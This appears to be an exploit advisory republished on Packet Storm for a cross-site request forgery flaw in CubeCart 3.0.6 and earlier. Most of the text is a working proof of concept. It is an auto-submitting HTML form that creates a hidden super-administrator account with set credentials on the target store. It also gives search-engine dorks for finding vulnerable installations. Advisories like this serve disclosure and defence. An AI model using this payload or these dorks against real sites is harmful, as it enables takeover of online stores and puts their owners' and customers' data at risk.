CubeCart versions 3.0.6 and below suffer from a cross site request forgery vulnerability.
f36afc8eeae89b5e4070e364edf0da48855ef98d4e2c55dad503639eeae30560#Title : CubeCart <= 3.0.6 CSRF Add Admin
#Script : CubeCart <= 3.0.6
#Language : Php
#Download : http://www.cubecart.com/
#Date : 2010/12/24
#Version : 3.0.6
#Dork : "Powered by CubeCart 3.0.4"
#Dork : "Powered by CubeCart 3.0.5"
#Dork : "Powered by CubeCart 3.0.6"
#Found : by P0C T34M >> tnt-r00t
#Homepage : www.p0c.cc
<form name="p0c" action="http://127.0.0.1/cc/admin/adminusers/administrators.php?mode=new" method="post">
<input name="name" type="hidden" value="myname"/ >
<input name="adminUsername" type="hidden" value="r00t" />
<input name="email" type="hidden" value="myemail@hotmail.com">
<input name="adminPassword" type="hidden" value="t00r" />
<input name="isSuper" type="hidden" value="1" checked="checked" type="radio"/>
<input name="adminId" value="" type="hidden"/>
<input name="Submit" type="hidden" class="submit" value="Add User" type="submit"/>
</form>
<script>document.p0c.submit();</script>
NICKNAME: P0C T34M
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed